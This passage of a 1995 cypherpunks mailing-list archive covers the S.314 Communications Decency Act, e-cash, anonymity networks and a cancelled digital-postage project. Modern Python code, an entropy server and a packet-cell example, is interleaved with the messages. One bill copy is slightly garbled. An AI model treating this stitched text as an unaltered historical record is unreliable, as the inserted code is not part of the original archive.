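        need = -(-nbytes // BLOCK_BYTES)         # ceiling division
        if nbytes <= 0 or need > len(self.bank):
            return None
        out = b"".join(self.bank.popleft() for _ in range(need))
        return out[:nbytes]                      # unused tail is discarded, never reused


def is_local(peer_addr):
    """True only for loopback addresses; unparsable input is treated as remote."""
    try:
        return ipaddress.ip_address(peer_addr).is_loopback
    except ValueError:
        return False


def serve(bank, peer_addr, nbytes):
    """Answer one request; None means 'not enough fresh entropy yet, retry later'."""
    if not is_local(peer_addr):
        raise PermissionError("noise is served to the local machine only")
    return bank.take(nbytes)


def demo():
    bank = NoiseBank()
    early = serve(bank, "127.0.0.1", 16)         # nothing banked yet
    for i in range(8):                           # constructed samples, assumed 32 bits each
        bank.add_noise(b"constructed-timing-sample-%d" % i, 32)
    first = serve(bank, "127.0.0.1", 16)         # served at once from the bank
    second = serve(bank, "::1", 10)              # a different block, partly used
    third = serve(bank, "127.0.0.1", 1)          # bank drained again
    return early, first, second, third


if __name__ == "__main__":
    print(demo())
```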




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 7 Feb 95 19:34:36 PST
To: Ben <samman@CS.YALE.EDU>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SUN.3.91.950207193831.7816I-100000@jaguar.zoo.cs.yale.edu>
Message-ID: <g53ElKjqRy8I078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Tue, 7 Feb 1995 19:40:24 -0500 (EST), Ben <samman@CS.YALE.EDU> wrote:

> Just use netnews for mail then.  We can divide up netnews into different
> regions pgp.us.ca.north  pgp.us.ca.south etc. and then just post pgp'd
> messages to the net.  Kinda like blacknet.  Ok so there's a high cost
> involved in it, granted.

The problem is that providers will be responsible for all traffic coming in
and going out of their system. This includes usenet. I would imagine that
the same filters would be applied to news too.

I think we need to start lobbying now. I find it amazing that CPR and EFF
haven't picked this up yet.

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
         "Automatic" simply means that you cannot repair it yourself.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Tue, 7 Feb 95 21:26:30 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <9502072124.aa20836@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


For my congresional 'representatives'.

S.314 is not a moral bill.  Making the owner of a computer (or
computer network) responsible for what its users store (or transmit)
is like making the owners of a parking lot responsible for what is
stored in the cars parked there.  It just isn't moraly reasonable.

S.314 is un-American.  America has always been a place where speach is
freeest.  We have consistently held the expression of ideas to be one
of the very most important rights.  To hold the owner of a buliten
board responsible for the illegal messages posted to it, is to force
the buliten board owner to become a government censor in all but name
(and wages).  It effectively ends the bulliten board's use as a venue
of free speach.

S.314 is harmfull to America.  The kind of 'chilling effect' this bill
wil place on the computer (networking) industry would put american
companies at a serious disadvantage.  Could I really operate an
airline reservtion system for a large airline if I could be held
liable for illegal information transmitted using my equipment?  No.
Could I operate the masive software and hardware networks that the
phone system requires?  No.  But, I bet the company I own in Mexico,
or in Canada could.  They aren't burdened with such (artificially
created) liabilities.  Or perhaps I could get a special waiver from my
friends in Washington. Hmmm.  How much will these sorts of 'work
arounds' cost american bussiness?

S.314 is not enforceable.  There is no certain way to tell if a file
of data is an illegal one.  Stegnography and cryptography, along with
the fact that what a bit means depends on which programs are used to
interpret it, mean that even this message could be porno, terrorist
threats, or arangements for drug trafficing.  Imagin searching all the
cars in your parking lot for drugs.  Very expensive, and not very
reliable.  Tons of drugs travel past just such inspection sites each
year.  Now imagine how tough it would be if the drugs could be turned
into perfectly normal steal in the body panels of the vehicles!  That
is what stegnography and cryptography do to data.  Turn perfectly
'awfull' data into data perfectly indistinguishable from noise, and
then hide the noise as indistinguishable-from-inocent 'errors' in
other data.  Concider the spelling in this message -- convert each
word into a bit -- 1 if it is speled right, 0 if not.  Or how about
spacing, or, punctuation -- Hmmm.  Now supose we add otras idiomas,
aux eble muchos languages en cxiu mesagxon.  Will computer (network)
owners be responsible for the spelling, punctuation, language, word
choice, and grammer of all the electronic mail sent, received, and
stored?

S.314 is bad for *your* career.  If you vote to support it, I will
vote against you in upcoming elections.  I will work to impeach you.
I will never employ you, I will not read your memoirs, I will not do
business with you in any way what so ever.

I urge you to think twice, and then vote no on S.314.

j'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Tue, 7 Feb 95 21:27:31 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
Message-ID: <v03001400ab5e06968201@[140.174.229.225]>
MIME-Version: 1.0
Content-Type: text/plain


>Can anyone confirm this S.314 thing?  It sounds an awful lot like
>the "modem tax" and other urban legends.

S 314 IS
104th CONGRESS
1st Session
To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
                 IN THE SENATE OF THE UNITED STATES
           February 1 (legislative day, January 30), 1995
Mr. Exon (for himself and Mr. Gorton) introduced the following
    bill; which was read twice and referred to the Committee on
    Commerce, Science, and Transportation
                               A BILL
To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
  Be it enacted by the Senate and House of Representatives of the
United States of America in Congress assembled,
SECTION 1. SHORT TITLE.
  This Act may be cited as the `Communications Decency Act of 1995'.
SEC. 2. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES
                  UNDER THE COMMUNICATIONS ACT OF 1934.
  (a) Offenses: Section 223 of the Communications Act of 1934 (47
U.S.C. 223) is amended--
      (1) in subsection (a)(1)--
          (A) by striking out `telephone' in the matter above
        subparagraph (A) and inserting `telecommunications device';
          (B) by striking out `makes any comment, request,
        suggestion, or proposal' in subparagraph (A) and inserting
        `makes, transmits, or otherwise makes available any
        comment, request, suggestion, proposal, image, or other
        communication';
          (C) by striking out subparagraph (B) and inserting the
        following:
          `(B) makes a telephone call or utilizes a
        telecommunications device, whether or not conversation or
        communications ensues, without disclosing his identity and
        with intent to annoy, abuse, threaten, or harass any person
        at the called number or who receives the communication;' and
          (D) by striking out subparagraph (D) and inserting the
        following:
          `(D) makes repeated telephone calls or repeatedly
        initiates communication with a telecommunications device,
        during which conversation or communication ensues, solely
        to harass any person at the called number or who receives
        the communication; or';
      (2) in subsection (a)(2), by striking `telephone facility'
    and inserting `telecommunications facility';
      (3) in subsection (b)(1)--
          (A) in subparagraph (A)--
              (i) by striking `telephone' and inserting
            `telecommunications device'; and
              (ii) inserting `or initiated the communication' and
            `placed the call', and
          (B) in subparagraph (B), by striking `telephone facility'
        and inserting `telecommunications facility'; and
      (4) in subsection (b)(2)--
          (A) in subparagraph (A)--
              (i) by striking `by means of telephone, makes' and
            inserting `by means of telephone or telecommunications
            device, makes, knowingly transmits, or knowingly makes
            available'; and
              (ii) by inserting `or initiated the communication'
            after `placed the call'; and
          (B) in subparagraph (B), by striking `telephone facility'
        and inserting in lieu thereof `telecommunications facility'.
  (b) Penalties: Section 223 of such Act (47 U.S.C. 223) is amended--
      (1) by striking out `$50,000' each place it appears and
    inserting `$100,000'; and
      (2) by striking `six months' each place it appears and
    inserting `2 years'.
  (c) Prohibition on Provision of Access: Subsection (c)(1) of such
section (47 U.S.C. 223(c)) is amended by striking `telephone' and
inserting `telecommunications device.'
  (d) Conforming Amendment: The section heading for such section is
amended to read as follows:
`obscene or harassing utilization of telecommunications devices and
facilities in the district of columbia or in interstate or foreign
communications'.
SEC. 3. OBSCENE PROGRAMMING ON CABLE TELEVISION.
  Section 639 of the Communications Act of 1934 (47 U.S.C. 559) is
amended by striking `$10,000' and inserting `$100,000'.
SEC. 4. BROADCASTING OBSCENE LANGUAGE ON RADIO.
  Section 1464 of title 18, United States Code, is amended by
striking out `$10,000' and inserting `$100,000'.
SEC. 5. INTERCEPTION AND DISCLOSURE OF ELECTRONIC COMMUNICATIONS.
  Section 2511 of title 18, United States Code, is amended--
      (1) in paragraph (1)--
          (A) by striking `wire, oral, or electronic communication'
        each place it appears and inserting `wire, oral,
        electronic, or digital communication', and
          (B) in the matter designated as `(b)', by striking `oral
        communication' in the matter above clause (i) and inserting
        `communication'; and
      (2) in paragraph (2)(a), by striking `wire or electronic
    communication service' each place it appears (other than in the
    second sentence) and inserting `wire, electronic, or digital
    communication service'.
SEC. 6. ADDITIONAL PROHIBITION ON BILLING FOR TOLL-FREE TELEPHONE
                  CALLS.
  Section 228(c)(6) of the Communications Act of 1934 (47 U.S.C.
228(c)(6)) is amended--
      (1) by striking `or' at the end of subparagraph (C);
      (2) by striking the period at the end of subparagraph (D) and
    inserting a semicolon and `or'; and
      (3) by adding at the end thereof the following:
          `(E) the calling party being assessed, by virtue of being
        asked to connect or otherwise transfer to a pay-per-call
        service, a charge for the call.'.
SEC. 7. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
  Part IV of title VI of the Communications Act of 1934 (47 U.S.C.
551 et seq.) is amended by adding at the end the following:
`SEC. 640. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
  `(a) Requirement: In providing video programming unsuitable for
children to any subscriber through a cable system, a cable operator
shall fully scramble or otherwise fully block the video and audio
portion of each channel carrying such programming so that one not a
subscriber does not receive it.
  `(b) Definition: As used in this section, the term `scramble'
means to rearrange the content of the signal of the programming so
that the programming cannot be received by persons unauthorized to
receive the programming.'.
SEC. 8. CABLE OPERATOR REFUSAL TO CARRY CERTAIN PROGRAMS.
  (a) Public, Educational, and Governmental Channels: Section
611(e) of the Communications Act of 1934 (47 U.S.C. 531(e)) is
amended by inserting before the period the following: `, except a
cable operator may refuse to transmit any public access program or
portion of a public access program which contains obscenity,
indecency, or nudity'.
  (b) Cable Channels for Commercial Use: Section 612(c)(2) of the
Communications Act of 1934 (47 U.S.C. 532(c)(2)) is amended by
striking `an operator' and inserting `a cable operator may refuse
to transmit any leased access program or portion of a leased access
program which contains obscenity, indecency, or nudity.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpp@markv.com
Date: Tue, 7 Feb 95 21:39:19 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.SV4.3.91.950207230934.23719A-100000@mirage.skypoint.com>
Message-ID: <9502072138.aa29510@hermix.markv.com>
MIME-Version: 1.0
Content-Type: text/plain


Uh oh!  Egg on my face.  Will someone explain to me how the amendments
in S.314 make owners of ISPs or other computer systems liable for
'bad' data?  I apologize for my previous uncalled for (so it seems to
me now) ranting.

j*blushing*'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Huntting <huntting@glarp.com>
Date: Tue, 7 Feb 95 20:46:01 PST
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <3a0ElKjqRqtP078yn@mirage.skypoint.com>
Message-ID: <199502080445.VAA00395@misc.glarp.com>
MIME-Version: 1.0
Content-Type: text/plain



Can anyone confirm this S.314 thing?  It sounds an awful lot like
the "modem tax" and other urban legends.


brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@panix.com>
Date: Tue, 7 Feb 95 18:47:04 PST
To: cypherpunks@toad.com (Good Guys)
Subject: forward; e-cash
Message-ID: <199502080246.AA02904@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


NETCHEQUE WANTS TO BE YOUR CYBERBANKER The long-anticipated digital
commerce boom hinges on one important factor -- the ability to safely
and securely conduct monetary transactions in cyberspace. A team of
scientists at the University of Southern California are working on a
system called NetCheque that would allow banks and their customers
to send an electronic check over the Internet, complete with a digital
signature that cannot be forged. "With NetCheque, if your balances are
positive it's like a checking account. If they're negative, it's like
a credit-card account... It really depends very much on how you want
to set up this very flexible mechanism," says the USC team leader. The
system was recently released for testing, and those interested in
participation should send mail to netcheque@isi.edu. (Chronicle of
Higher Education 2/10/95 A18)

-- 
Harry S. Hawk  		   habs@panix.com
Product Marketing Manager
PowerMail, Inc. 	   Producers of MailWeir(tm) & PowerServ(tm)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 7 Feb 95 21:50:50 PST
To: huntting@glarp.com (Brad Huntting)
Subject: S.314, the "Pi Bill"
In-Reply-To: <199502080445.VAA00395@misc.glarp.com>
Message-ID: <199502080547.VAA28367@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Brad Huntting wrote:

> Can anyone confirm this S.314 thing?  It sounds an awful lot like
> the "modem tax" and other urban legends.
> 
> 

I wrote a post to comp.org.eff.talk in which I asked if "S.314" isn't
just the "Pi Bill," in which pi = 3.14 is mandated to be pi = 3.00.

S.314 I initially, for a minute or so, thought to be a put-on, a
spoof. But the text lacked other signs of humor and had the trappings
of a real bill. And then versions from reputable groups began to
appear, so I was of course convinced it was real.

If it's a spoof, it's too cute by half.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arsen Ray Arachelian <rarachel@photon.poly.edu>
Date: Tue, 7 Feb 95 19:24:07 PST
To: cypherpunks@toad.com
Subject: !NYC Cypherpunks meeting 2/11/95!
Message-ID: <Pine.3.89.9502072204.B12080-0100000@photon.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain



In case you're in the NYC area, there is a meeting this Saturday.  (If 
you're already on the list of NYC Cypherpunks, you'd have received the 
notice with the address.)  If you're in NYC, but not on the NYC 
Cypherpunks list, and you need info, please send email to me, 
rarachel@photon.poly.edu, and I'll give you directions.

See you there..
--Ray.

===============================================================================
| + ^ + || ' . . .   .   . .   .             Ray  (Arsen)  Arachelian        ||
|  \|/  ||   . . .  ' . ' .  : . .           rarachel@photon.poly.edu        ||
|<--+-->||.   . . |' '| .' .  .  ...    ___  sunder@intercom.com             ||
|  /|\  ||   .  . \___/ .  . . : .... __[R]                                  ||
| + v + || . oOOo /o.O\ oOOo :. : ..    |A| "And bugs to kill before I sleep"||
=========/---vvvv-------VVVV------------|I|----------------------------------/
        /      .    :   . ' : '         |D|     This signature pannel is    /
       /  The Next Bug to kill(tm)      ---     now open.                  / 
      /___________________________________________________________________/
GCS d++(---)(-) H s+++/++ !g !p !au a- w-(+) (!v | v)  C+++++ Coherent++++ 
L+ 3 C+ V+ P? E- N++ K- W W--- M++ V-- po- Y+++ t:[tos+, tng--, ds9+] 5 !j
!R G? tv+ b+++ D+ B--- e+(- | *) u--- h+++ f+(++) r++ n+(---) x**(++)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 22:53:33 PST
To: eric@remailer.net>
Subject: RE: a new way to do anonymity
Message-ID: <Chameleon.4.01.950207225342.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>   There are many, many analogies you can draw about a network of this
>   type to an ATM (asynchronous transfer mode) network.  
>
>Thank you for the analogy.  It's always good not to reinvent the wheel
>when you don't need to.

Exactly.  Anywhere we can "stand on the shoulders" of others reduces wasted
time and effort.

>When you set up a mapping on a packet forwarder, this is exactly the
>kind of initialization that would be required.  It is also at this
>point that keying would be negotiated, etc.

Encrypt-Telnet to a switch process.  Use text based command line sequence
to check outbound paths, bandwidth available, negotiate quality of service,
execute digital payment arrangements, etc.  Conclude the transaction and
get bumped to your next hop, where it happens all over again.

Done right, it could probably be automated.  It seems like a lot of effort,
but if you remember that once an initial session is established with your
Pipe-net Service Provider (tm), a given circuit can be relatively long-lived.

>Now here's an important detail that needs to get done right.  Is the
>forwarding for fixed length packets, variable length packets, or
>streams?  Is this decision global or local?  What are the latency and
>aggregation effects?  How important are these for different classes
>of data?  (telnet v. voice, e.g.)

One of the lessons learned in the years-long debate between the telco folks
pushing synchronous time-division multiplexing point to point circuit switches 
and the data folks pushing variable length packet-switched broadcast medium
networks is that fixed length packets can give you both TDM and statistical
multiplexing.  So, at the bottom most session layer, moving bits around in
fixed chunks allows you to do things easier like bandwidth pre-allocation,
aggregation, circuit based congestion control, and negotiated quality of
service agreements to end points in the network.

To learn from the efforts that have come from the thousands of people working
on ATM, we could take a look at what has emerged as the "ATM Adaptation Layer."

AAL specifies methods to encapsulate various data formats and quality of service
requirements onto this fixed length, continuous stream of data packets.  There
is one for voice traffic, which requires fixed bandwidth and very little relative
latency, another for LAN type data packets, which have bursty bandwidth requirements 
and variable packet sizes.  Your comment above is accurate in that the
requirements involved in a Telnet session are vastly different from say, PGP
Phone over TCP.

The good part about all this is that a lot of the thinking, testing, prototyping,
and standardization has already been done.  The standards exist today for adapting
variable bandwidth, variable packet length, variable latency data packets onto
a continuous stream of fixed length packets moving through a switched network.

This reminds me of the old days of Packet Radio which used intelligent repeaters
that you would access (via command line), determine your next repeater, then
log into it, etc.  I once established a virtual circuit from Connecticut to Florida
over 2 meter packet that took 25 or so hops, and had a transit delay of a half
an hour.  Primitive, kludgy, unreliable, and essentially useless, but totally cool.

An opportunity presents itself here to establish this Pipe-net style service
network, that would greatly expand the ability for network users to essentially
bypass all the crap which appears to be coming down on us from our friendly 
representatives in Washington, who are trying so hard to "protect" us from 
ourselves. 

>I'd suggest just getting something running first, to get some
>prototyping experience.

Of course.  What I've outlined is a pretty ambitious goal.  I'd be happy to see
primitive switch implementations that do nothing more than forward TCP streams.
It's a start and we would learn a lot along the way.  Alas, I don't do Unix; my
programming expertise is in (gasp) the Windows environment.  So it looks like
I could start looking at the requirements implementation of a Winsock interface
that made all this stuff transparent to an end user.  Important consideration.

I suppose the IRC folks could add their experience to the mix.  In a very real
way, IRC _is_ a packet switched unicast/multicast stream service on top of the
'net.  Do we have any IRC op types onboard here?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzhqMU1Diok8GKihAQGRxAP/dWIvYMuqX5c1y/Mlmc73WQlQ/1263vqb
YzGMvgTFEP0p/jZZstb8tMOyHY2KKp7WWLXV94jd8/KhdQgYFtGHphVm93WP3Bu8
hRK8kV5UEtANQ/JycVHG6HU3MMxLhE+Yh+M/CFLBwBZZYYglnV3DLqBHv4kq+5Tg
/7ZiTjnHRDk=
=ee6L
-----END PGP SIGNATURE-----
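
The fixed-length forwarding discussed in the message above, with variable-length packets carried in constant-size cells and idle filler keeping the rate steady, can be sketched as follows. This is an added example, not code from the list or from any ATM standard; the 64-byte cell size, the 4-byte header layout and all function names are assumptions made for illustration.

```python
import struct

CELL_SIZE = 64                      # assumed cell size for this sketch
HEADER = struct.Struct("!HBB")      # assumed layout: circuit id, flags, payload length
PAYLOAD_SIZE = CELL_SIZE - HEADER.size
FLAG_LAST = 0x01                    # final cell of a packet
FLAG_IDLE = 0x02                    # filler cell, carries no data
MAX_PACKET = 65535                  # cap on what a receiver will reassemble


def segment(circuit_id, packet):
    """Split one packet into CELL_SIZE cells, zero-padding the last one."""
    if len(packet) > MAX_PACKET:
        raise ValueError("packet too large")
    chunks = [packet[i:i + PAYLOAD_SIZE]
              for i in range(0, len(packet), PAYLOAD_SIZE)] or [b""]
    cells = []
    for n, chunk in enumerate(chunks):
        flags = FLAG_LAST if n == len(chunks) - 1 else 0
        padding = bytes(PAYLOAD_SIZE - len(chunk))
        cells.append(HEADER.pack(circuit_id, flags, len(chunk)) + chunk + padding)
    return cells


def idle_cell(circuit_id):
    """A cell of the same size as any other, sent when there is no data."""
    return HEADER.pack(circuit_id, FLAG_IDLE, 0) + bytes(PAYLOAD_SIZE)


def fill_slots(queued, slots, circuit_id):
    """Emit exactly `slots` cells (pre-allocated bandwidth): data, then filler."""
    sent = list(queued[:slots])
    sent += [idle_cell(circuit_id)] * (slots - len(sent))
    return sent, list(queued[slots:])


class Reassembler:
    """Rebuild packets per circuit, rejecting malformed or oversized input."""

    def __init__(self):
        self._partial = {}

    def feed(self, cell):
        if len(cell) != CELL_SIZE:
            raise ValueError("cell has wrong length")
        circuit_id, flags, length = HEADER.unpack_from(cell)
        if length > PAYLOAD_SIZE:
            raise ValueError("length field exceeds payload size")
        if flags & FLAG_IDLE:
            return None
        buf = self._partial.setdefault(circuit_id, bytearray())
        buf += cell[HEADER.size:HEADER.size + length]
        if len(buf) > MAX_PACKET:
            del self._partial[circuit_id]
            raise ValueError("reassembled packet too large")
        if flags & FLAG_LAST:
            return circuit_id, bytes(self._partial.pop(circuit_id))
        return None


def demo():
    keystroke = b"l"              # constructed sample: one telnet keystroke
    voice = bytes(range(150))     # constructed sample: a 150-byte voice frame
    queue = segment(7, keystroke) + segment(7, voice)
    sent, left = fill_slots(queue, 6, 7)
    rx = Reassembler()
    results = (rx.feed(cell) for cell in sent)
    return sent, left, [r for r in results if r is not None]


if __name__ == "__main__":
    sent, left, packets = demo()
    print(len(sent), "cells of", CELL_SIZE, "bytes;", len(packets), "packets rebuilt")
```

On the wire the one-byte keystroke and the 150-byte frame are indistinguishable by size; in a real link the cell contents, padding included, would also have to be encrypted for an observer to learn nothing from them.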






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Tue, 7 Feb 95 22:35:37 PST
To: cypherpunks@toad.com
Subject: USPO & Digital Postage/E-Cash Project
Message-ID: <199502080625.WAA20933@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The US Post Office just killed a project that would have created a 
digital postage/e-cash system.  This would have been a digital 
replacement for the Pitney-Bowes style Postage Metering machines.  To use 
a PM machine one has to take the entire machine physically to a Postal 
Station and purchase some fixed dollar amount of postage.  The Postal 
clerk unseals and unlocks the machine, dials in the amount of postage 
purchased and then relocks and reseals the machine.  

This mechanical system would have been replaced by a serial-port dongle 
and a piece of software.  The dongle would contain an EEPROM in a 
replaceable button (made by Dallas Semiconductor) into which would be 
loaded data indicating the amount of postage that had been purchased and 
not yet used.  The software package would be able to print the address, 
postage seal, routing codes, etc directly on the envelope via a laser 
printer and decrement the amount of available postage left in the 
dongle.  In the original test, customers would have to take the dongle 
to a Postal Station to purchase additional postage, but the ultimate 
goal was to have been to have a commercial dial-up service available 
that one could dial into and purchase additional postage directly. 

A proof-of-concept prototype was developed in VB and a production 
prototype was then developed in VC++.  Unfortunately the crypto wasn't 
very strong.  The USPO contracted with Carnegie-Mellon to try and break 
the system and they were able to within a couple of weeks.  USPO then 
killed the project.


Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 20:48:24 PST
To: Brad Huntting <huntting@glarp.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080445.VAA00395@misc.glarp.com>
Message-ID: <Pine.SV4.3.91.950207224618.23122A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, Brad Huntting wrote:

> 
> Can anyone confirm this S.314 thing?  It sounds an awful lot like
> the "modem tax" and other urban legends.
> 
> 
> brad
> 

Web over to: http://thomas.loc.gov

It's on the Senate's web server. The bill is for real. I wish it was only 
a hoax.

Sam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Tue, 7 Feb 95 21:12:51 PST
To: Brad Huntting <huntting@glarp.com>
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502080445.VAA00395@misc.glarp.com>
Message-ID: <Pine.SV4.3.91.950207230934.23719A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Feb 1995, Brad Huntting wrote:

> 
> Can anyone confirm this S.314 thing?  It sounds an awful lot like
> the "modem tax" and other urban legends.

Here is everything T.H.O.M.A.S. had on it. (http://thomas.loc.gov)

 S 314 IS
 104th CONGRESS
1st Session
To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
 IN THE SENATE OF THE UNITED STATES
February 1 (legislative day, January 30), 1995
 
Mr. Exon (for himself and Mr. Gorton) introduced the following
bill; which was read twice and referred to the Committee on
Commerce, Science, and Transportation

A BILL

To protect the public from the misuse of the telecommunications
network and telecommunications devices and facilities.
       Be it enacted by the Senate and House of Representatives of the
United States of America in Congress assembled,
 SECTION 1. SHORT TITLE.
This Act may be cited as the `Communications Decency Act of 1995'.
 
          SEC. 2. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES
UNDER THE COMMUNICATIONS ACT OF 1934.
 (a) Offenses: Section 223 of the Communications Act of 1934 (47
U.S.C. 223) is amended--
 (1) in subsection (a)(1)--
 (A) by striking out `telephone' in the matter above
        subparagraph (A) and inserting `telecommunications device';
 (B) by striking out `makes any comment, request,
        suggestion, or proposal' in subparagraph (A) and inserting
        `makes, transmits, or otherwise makes available any
comment, request, suggestion, proposal, image, or other
communication';
 (C) by striking out subparagraph (B) and inserting the
    following:
      `(B) makes a telephone call or utilizes a
telecommunications device, whether or not conversation or
        communications ensues, without disclosing his identity and
        with intent to annoy, abuse, threaten, or harass any person
      at the called number or who receives the communication;' and
 (D) by striking out subparagraph (D) and inserting the
        following:     
        `(D) makes repeated telephone calls or repeatedly
        initiates communication with a telecommunications device,
during which conversation or communication ensues, solely
      to harass any person at the called number or who receives
        the communication; or';
22), by striking `telephone facility'
and inserting `telecommunications facility'; 
(3) in subsection (b)(1)--
(A) in subparagraph (A)--
      (i) by striking `telephone' and inserting
    `telecommunications device'; and
      (ii) inserting `or initiated the communication' and
    `placed the call', and
(B) in subparagraph (B), by striking `telephone facility'
and inserting `telecommunications facility'; and
(4) in subsection (b)(2)-- 
  (A) in subparagraph (A)--
      (i) by striking `by means of telephone, makes' and  
    inserting `by means of telephone or telecommunications 
    device, makes, knowingly transmits, or knowingly makes  
  available'; and
      (ii) by inserting `or initiated the communication'
  after `placed the call'; and
  (B) in subparagraph (B), by striking `telephone facility'
and inserting in lieu thereof `telecommunications facility'.
(b) Penalties: Section 223 of such Act (47 U.S.C. 223) is amended--
(1) by striking out `$50,000' each place it appears and
inserting `$100,000'; and
  (2) by striking `six months' each place it appears and
inserting `2 years'.
(c) Prohibition on Provision of Access: Subsection (c)(1) of such
section (47 U.S.C. 223(c)) is amended by striking `telephone' and
inserting `telecommunications device.'
(d) Conforming Amendment: The section heading for such section is
amended to read as follows:
`obscene or harassing utilization of telecommunications devices and
facilities in the district of columbia or in interstate or foreign
communications'.
SEC. 3. OBSCENE PROGRAMMING ON CABLE TELEVISION.
Section 639 of the Communications Act of 1934 (47 U.S.C. 559) is
amended by striking `$10,000' and inserting `$100,000'.
SEC. 4. BROADCASTING OBSCENE LANGUAGE ON RADIO. 
Section 1464 of title 18, United States Code, is amended by
striking out `$10,000' and inserting `$100,000'.
SEC. 5. INTERCEPTION AND DISCLOSURE OF ELECTRONIC COMMUNICATIONS.
Section 2511 of title 18, United States Code, is amended--
(1) in paragraph (1)--
        (A) by striking `wire, oral, or electronic communication'  
  each place it appears and inserting `wire, oral,     
    electronic, or digital communication', and
    (B) in the matter designated as `(b)', by striking `oral
    communication' in the matter above clause (i) and inserting
      `communication'; and
      (2) in paragraph (2)(a), by striking `wire or electronic   
    communication service' each place it appears (other than in the
  second sentence) and inserting `wire, electronic, or digital   
    communication service'.
SEC. 6. ADDITIONAL PROHIBITION ON BILLING FOR TOLL-FREE TELEPHONE  
 CALLS.
  Section 228(c)(6) of the Communications Act of 1934 (47 U.S.C.
228(c)(6)) is amended--
    (1) by striking `or' at the end of subparagraph (C); 
      (2) by striking the period at the end of subparagraph (D) and
    inserting a semicolon and `or'; and
    (3) by adding at the end thereof the following:
 `(E) the calling party being assessed, by virtue of being
        asked to connect or otherwise transfer to a pay-per-call 
      service, a charge for the call.'. 
SEC. 7. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
Part IV of title VI of the Communications Act of 1934 (47 U.S.C. 
551 et seq.) is amended by adding at the end the following:
`SEC. 640. SCRAMBLING OF CABLE CHANNELS FOR NONSUBSCRIBERS.
`(a) Requirement: In providing video programming unsuitable for 
children to any subscriber through a cable system, a cable operator
shall fully scramble or otherwise fully block the video and audio
portion of each channel carrying such programming so that one not a
subscriber does not receive it. 
`(b) Definition: As used in this section, the term `scramble' 
